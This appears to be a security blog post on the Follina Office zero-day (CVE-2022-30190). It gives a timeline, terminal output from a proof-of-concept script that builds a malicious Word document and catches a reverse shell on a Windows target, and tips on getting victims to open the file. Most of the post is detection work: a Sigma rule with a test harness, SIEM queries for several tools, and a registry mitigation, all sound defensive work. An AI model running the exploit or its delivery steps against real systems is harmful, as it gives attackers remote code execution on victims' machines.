Reproducing the CVE-2022-30190 using the sample POC along with detection and mitigations
This post shows how to reproduce the new Microsoft 0-day known as CVE-2022-30190 with the sample POC, and then covers detection and mitigations.
If you want a more technical read on the bug, refer to the following resource.
Timeline
April 12th 2022 — First report to Microsoft MSRC, by the leader of Shadowchasing1, an APT hunting group. The document was an in-the-wild, real-world exploit targeting Russia, themed as a Russian job interview.
April 21st 2022 — Microsoft MSRC closed the ticket, saying it was not a security-related issue (for the record, msdt executing with macros disabled is an issue).
May ?? 2022 — Microsoft may have tried to fix this, or accidentally fixed it, in the Office 365 Insider channel, without documenting a CVE or writing it down anywhere. The other products remain vulnerable.
May 27th 2022 — Security vendor nao_sec tweeted about a document uploaded from Belarus, which is also an in-the-wild attack.
May 27th 2022 — Reported back to MSRC.
May 29th 2022 — Andy Ful publicly identified this as a zero day, as it still works against the Office 365 Semi-Annual channel and 'on prem' Office versions, and EDR products are failing to detect it.
To get a shell, first run the script, which starts a listener.
root@kali ~/msdt-follina (main)# python3 follina.py -r 9001
[+] copied staging doc /tmp/r1yug4g9
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
[+] starting 'nc -lvnp 9001'
listening on [any] 9001 ...
The exploit directory now contains a follina.doc; transfer it to the Windows 10 target machine. In a real-world scenario the doc would be sent via email, or the victim would be social-engineered into downloading it from the attacker's external DNS server.
After this step, open the Word document.
Click on 'Enable Editing'.
This will load up the 'Troubleshooter'; check back on the listener.
root@kali ~/msdt-follina (main)# python3 follina.py -r 9001
[+] copied staging doc /tmp/r1yug4g9
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
[+] starting 'nc -lvnp 9001'
listening on [any] 9001 ...
connect to [192.168.1.2] from (UNKNOWN) [192.168.1.5] 63142
Microsoft Windows [Version 10.0.22000.593]
(c) Microsoft Corporation. All rights reserved.
C:\Users\User\AppData\Local\Temp\SDIAG_b2c85456-72f5-4c24-9728-d72bc16950d8>whoami
whoami
windev2204eval\user
title: ms-msdt for RCE CVE-2022-30190
description: Detecting the execution of a weaponized maldoc or an embedded link in Outlook that uses the ms-msdt scheme to execute code.
status: experimental
references:
  - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190
  - https://twitter.com/nao_sec/status/1530196847679401984
  - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
  - https://twitter.com/secforce_ltd/status/1531987722293886978?s=21&t=f6-tesTzFEhR7TSoyTtp8Q
author: '@Kostastsale'
date: 2022/05/29
logsource:
  category: process_creation
  product: windows
detection:
  selection1:
    Image|endswith:
      - '\msdt.exe'
    CommandLine|contains|all:
      - 'msdt'
      - '/id'
  selection2:
    CommandLine|contains|all:
      - 'IT_BrowseForFile'
      - 'IT_LaunchMethod'
  selection3:
    CommandLine|contains|all:
      - '/af'
      - '.xml'
  condition: selection1 and (selection2 or selection3)
falsepositives:
  - Unknown
level: high
tags:
  - attack.execution
  - attack.t1059.003
  - attack.t1204.002
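To see how the rule's condition (selection1 and (selection2 or selection3)) behaves on real-looking telemetry, here is an added example, not part of the original post or the Sigma rule, that implements the rule's matching logic in plain Python and runs it over constructed process-creation events. Sigma string matching is case-insensitive, so every comparison lowercases first; the sample command lines are constructed and carry no payload.

```python
# Added example: the Sigma rule above re-implemented in Python for testing.
# Sigma matching is case-insensitive, so both sides are lowercased.

def _ends_with(value, suffixes):
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)

def _contains_all(value, needles):
    v = value.lower()
    return all(n.lower() in v for n in needles)

def matches_ms_msdt_rule(event):
    """Return True when the event satisfies: selection1 and (selection2 or selection3)."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    selection1 = _ends_with(image, ["\\msdt.exe"]) and _contains_all(cmd, ["msdt", "/id"])
    selection2 = _contains_all(cmd, ["IT_BrowseForFile", "IT_LaunchMethod"])
    selection3 = _contains_all(cmd, ["/af", ".xml"])
    return selection1 and (selection2 or selection3)

# Constructed sample events (not real telemetry); keys mirror Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"desc": "Follina-style launch via the ms-msdt handler (payload removed)",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic '
                    r'/param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=REDACTED"'},
    {"desc": "Troubleshooter started from an answer file",
     "Image": r"C:\WINDOWS\system32\msdt.exe",
     "CommandLine": r"msdt.exe /id NetworkDiagnosticsWeb /af C:\Temp\answers.xml"},
    {"desc": "Benign: troubleshooter opened from Settings (selection1 only)",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r"C:\Windows\System32\msdt.exe /id AudioPlaybackDiagnostic"},
    {"desc": "Other binary whose command line merely mentions the keywords",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo msdt /id IT_BrowseForFile IT_LaunchMethod"},
]

def scan(events):
    """Return the descriptions of the events the rule would alert on."""
    return [e["desc"] for e in events if matches_ms_msdt_rule(e)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

The third event shows why the rule ANDs selection1 with the parameter selections: a plain troubleshooter launch contains msdt and /id but none of the ms-msdt handler parameters, so it stays quiet.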
Detection rules for common SOC tools are listed below.
Microsoft Defender
DeviceProcessEvents | where ((ProcessCommandLine contains "WINWORD.EXE") and (ProcessCommandLine contains "msdt.exe") and (ProcessCommandLine contains "sdiagnhost.exe" or ProcessCommandLine contains "csc.exe" or ProcessCommandLine contains "PCWDiagnostic" or ProcessCommandLine contains "IT_RebrowseForFile" or ProcessCommandLine contains "IT_BrowseForFile" or ProcessCommandLine contains "conhost.exe"))
Splunk
[Doc Malware]
alert.severity = 2
description = Detection (Rule ID: 74566a6a66aaasdq2ed)
cron_schedule = 0 * * * *
disabled = 1
is_scheduled = 1
is_visible = 1
dispatch.earliest_time = -60m@m
dispatch.latest_time = now
search = (source="WinEventLog:*" AND (CommandLine="*WINWORD.EXE*") AND (CommandLine="*msdt.exe*") AND (CommandLine="*sdiagnhost.exe*" OR CommandLine="*csc.exe*" OR CommandLine="*PCWDiagnostic*" OR CommandLine="*IT_RebrowseForFile*" OR CommandLine="*IT_BrowseForFile*" OR CommandLine="*conhost.exe*"))
alert.suppress = 0
alert.track = 1
Qradar
SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and ("Process CommandLine" ilike '%WINWORD.EXE%') and ("Process CommandLine" ilike '%msdt.exe%') and ("Process CommandLine" ilike '%sdiagnhost.exe%' or "Process CommandLine" ilike '%csc.exe%' or "Process CommandLine" ilike '%PCWDiagnostic%' or "Process CommandLine" ilike '%IT_RebrowseForFile%' or "Process CommandLine" ilike '%IT_BrowseForFile%' or "Process CommandLine" ilike '%conhost.exe%')
GrayLog
(CommandLine.keyword:*WINWORD.EXE* AND CommandLine.keyword:*msdt.exe* AND CommandLine.keyword:(*sdiagnhost.exe* *csc.exe* *PCWDiagnostic* *IT_RebrowseForFile* *IT_BrowseForFile* *conhost.exe*))
Sumologic
(_sourceCategory=*windows* AND (CommandLine = "*WINWORD.EXE*") AND (CommandLine = "*msdt.exe*") AND (CommandLine = "*sdiagnhost.exe*" OR CommandLine = "*csc.exe*" OR CommandLine = "*PCWDiagnostic*" OR CommandLine = "*IT_RebrowseForFile*" OR CommandLine = "*IT_BrowseForFile*" OR CommandLine = "*conhost.exe*"))
Elastic KQL
(process.command_line:*WINWORD.EXE* AND process.command_line:*msdt.exe* AND process.command_line:(*sdiagnhost.exe* OR *csc.exe* OR *PCWDiagnostic* OR *IT_RebrowseForFile* OR *IT_BrowseForFile* OR *conhost.exe*))
Elastic EQL
process where event.type in ("start" , "process_created") and (process.pe.original_file_name : "msdt.exe" or process.name : "msdt.exe") and (process.parent.pe.original_file_name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe") or process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"))
// Detects exploitation of the Follina Microsoft Office code execution vulnerability
SecurityEvent
| where EventID==4688
| where ParentProcessName has_any ('winword.exe','excel.exe','outlook.exe')
| where NewProcessName contains "msdt.exe" or CommandLine contains "msdt.exe"
| project TimeGenerated, NewProcessId, NewProcessName, ParentProcessName, CommandLine, EventID, Activity, Computer
// The query below could return false positives; verify the output and adjust the query to your environment.
SecurityEvent
| where EventID==4688
| where ParentProcessName has_any ('sdiagnhost.exe', 'msdt.exe')
//| where NewProcessName contains "powershell" or NewProcessName contains "cmd.exe" // optional: include this line to find powershell or cmd spawns directly
| project TimeGenerated, NewProcessId, NewProcessName, ParentProcessName, CommandLine, EventID, Activity, Computer
Mitigations
Removing the protocol handler for ms-msdt is likely the safest mitigation until there is an official response from Microsoft. We have not tested this method in large enterprises, so there may be secondary effects of widely disabling the protocol handler. However, considering the implications of successful exploitation (arbitrary code execution), this seems like a reasonable risk-based approach (at least on any systems where Office documents are opened). Removing the protocol handler is as simple as executing the following command in an elevated command prompt. Note that you should back up the contents of this key before deleting them, so they can be merged back into the registry once a patch is available.
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
You can use the PowerShell script below to achieve the registry modification. Credit to Kelvin Tegelaar.
What makes this attack dangerous? It does not require the user to click on 'Enable Content', the prompt attackers abuse to deliver malicious macros, and the community is already aware of the dangers of macros.
This attack only requires the user to click on 'Enable Editing', which exits Protected View; with a little more tweaking it may become a 0-click attack vector.